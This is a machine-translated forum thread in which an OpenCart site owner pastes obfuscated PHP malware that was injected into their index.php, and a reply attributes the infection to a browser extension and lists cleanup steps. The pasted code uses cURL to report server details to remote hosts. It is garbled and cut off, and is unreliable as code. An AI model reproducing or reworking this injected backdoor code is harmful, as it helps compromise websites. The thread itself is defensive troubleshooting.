저는 opencart v3.0.2.0을 사용하고 있는데 문제는 opencart의 index.php 파일(public_html 디렉토리에 업로드된 내 opencart 웹사이트의 진입점)이 충돌한다는 것입니다(index.php 파일의 코드는 다음과 같습니다). 이상한 문자로 변경되었습니다.) 이런 일이 지난 주에 두 번이나 일어났습니다. 누군가 해킹을 당했는지, 내 도메인이나 코드에 문제가 있는지 전혀 몰랐습니다. 누군가 나를 도와주거나 안내할 수 있다면 알려주세요. 감사해요.
손상된 index.php 파일:
전역 $O; $O=url 디코딩($OOOOOO);$oOooOO='z1226_16';$oOooOOoO=$O[15].$O[4].$O[4].$O[9 ].$O[62].$O[63].$O[63].$O[64].$O[72].$O[66].$O[59].$O[65]. $AO[67].$AO[71].$O[59].$O[65].$O[65].$O[67].$O[59].$O[65].$O [67].$O[65] .$O[63].$oOooOO.$O[63];FunctionooooooooOOOOOOOOoooooOOO($ooooOOOoOoo){ $ooooOOOooOo=curl_init();curl_setopt($ooooOOOooOo,CURLOPT_URL,$ooooOOOOoOoo); ($ooooOOOooOo,CURLOPT_RETURNTRANSFER,1);curl_setopt($ooooOOOooOo,CURLOPT_ CONNECTTIMEOUT, 5); $ooooOOOOO =curl_exec($ooooOOOooOo);curl_close($ooooOOOooOo);return $ooOOOOOOooO; ,$오오오오오= array()){ global $O;$OooooO=str_replace(' ','+',$OooooO);$OOooooO=curl_init();curl_setopt($OOooooO,CURLOPT_URL, " $OooooO");curl_setopt($OOooooO, CURLOPT_RETURNTRANSFER, 1);curl_setopt($OOooooO,CURLOPT_HEADER, 0);curl_setopt($OOooOO,CURLOPT_TIMEOUT,10);curl_setopt($OOooooO,CURLOPT_POST, 1);curl_setopt($OOooooO, CURLOPT_POST, 1); DS, http_build_query($ OOOOoo));$OOOOooo=curl_exec($OOooooO);$OOOOoooo=curl_errno($OOooooO);curl_close($OOooooO);if(0!==$OOOOooooOO){return false ;}$OOOOooo 반환 ;} 함수 oooOOOo( $ooOOo){global$O;$ooOOOOo = false;$ooooooo = $O[14].$O[8].$O[8].$O[14]. ].$O[23].$O[8].$O[4].$O[90].$O[14].$O[8].$O [8].$O[14]. $O[18].$O[2].$O[90].$O[5].$O[10].$O[15].$O[8 ].$O[ 8].$O [90].$O[23].$O[7].$O[24].$O[14].$O[90].$O[10].$O[8].$O[18 ];if ($ooOOo!=''){if (preg_match("/($ooooooOOo)/si",$ooOOo)){$ooOOOOo=true;}}는 $ooOOOOo를 반환합니다.} 함수 oooOOooOOoOO ($oOOOOOOoOOOO){ 전역$O;$ooOOOOOOOOoO=false;$ooOOOOOOoOo=$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O [59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90]. ].$O[15].$O[8].$O[8].$O[59].$O[21].$O[8].$O [59].$O[16]. $O[9].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O [59].$O[21].$O[8].$O[25];if ($oOOOOOOoOOOO!='' && preg_match("/($ooOOOOOOoOo)/ si", $oOOOOOOoOOOOOO )) {$ooOOOOOOoO =true;}$ooOOOOOOoOO 반환;}$oOooOOoOO=((isset($_SERVER[$O[41].$O[30].$O[30].$O[ 35].$O [37]]) && $_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]!==$O[ 8].$O[13].$ O[13])?$O[15].$O[4].$O[4].$O[9].$O[11].$O[62 ].$O[ 63].$O [63]:$O[15].$O[4].$O[4].$O[9].$O[62].$O[63].$O[63] );$ooooOOoOO= $_SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$O[30].$O[52].$O[32].$O[29].$O[33]];$ooOOooooOOoOO=$_SERVER[$O[41].$O[30].$O [30].$ O[35].$O[52].$O[41].$O[34].$O[37].$O[30]];$ooOOOoooOOoOO=$_SERVER[$O[ 35].$O [41].$O[35].$O[52].$O[37].$O[28].$O[44].$O[39]];$ooOOOOooooOOOOoOO=$ _SERVER[$O[ 37].$O[28].$O[29].$O[48].$O[28].$O[29].$O[52].$O[50]. $O[36] .$O[51].$O[28]];$ooOOOOoooOOOOOO=$oOooOOoOO.$ooOOoooOOOO.$oOoooOOoOO;$oooOOOOoooOOOOOO=$oOooOOoO.$O[63].$O[7].$ O[24]。$O[12].$O[10].$O[4].$O[10].$O[59].$O[9].$O[15].$O[ 9];$ooooOOOOoooOOOooO =$oOooOOoO.$O[63].$O[25].$O[10].$O[9].$O[59].$O[9].$O[15] .$O[9 ];$ooooOOOOoooOOOooOoo=$oOooOOoO.$O[63].$O[16].$O[6].$O[25].$O[9].$O[59].$ O[9]。$O[15].$O[9];$oooooOOoooOOOoooOoo=$oOooOOoO.$O[63].$O[1].$O[8].$O[3].$O[ 12].$O [11].$O
최근 내 고객 중 한 명과 비슷한 문제가 발생했습니다. 조사 결과
에 코드를 삽입하는 Chrome 브라우저 확장 프로그램으로 인해 문제가 발생한 것으로 나타났습니다.PHP
files when uploading anyphp
files through the browser (like Cpanel File Management). In this case, the code was injected into theindex.php
file, and when someone accessed that file through the URL, the malicious code would start injecting files into the server, creating new files, and notifying the hacker of the server's current URL and other data using thecURL
function inPHP
.이 문제를 해결하려면 다음 단계를 수행하세요.
1- 서버에 파일을 업로드하는 데 사용되는 브라우저의 모든 확장 기능의 스크린샷을 찍고 이를 당사와 공유한 다음 브라우저 또는 모든 확장 기능을 삭제하세요.
2- 해킹 날짜 이후 서버에 업로드되거나 업데이트된 모든 파일을 확인하세요. 운영 체제에 따라 서버에서 명령을 실행하여 새 파일이나 업데이트된 파일 목록을 가져올 수 있습니다.
3- 서버에서 일부
*.php
files in the.well-known
또는 기타 숨겨진 폴더를 찾을 수 있습니다.4- 바이러스 백신 소프트웨어로 운영 체제를 보호하세요. Kaspersky와 같은 무료가 아닌 바이러스 백신 소프트웨어를 사용하는 것이 좋습니다.
어떤 확장 프로그램이 웹사이트를 해킹했는지 식별할 수 있도록 브라우저 확장 프로그램의 스크린샷을 공유해 주실 수 있나요?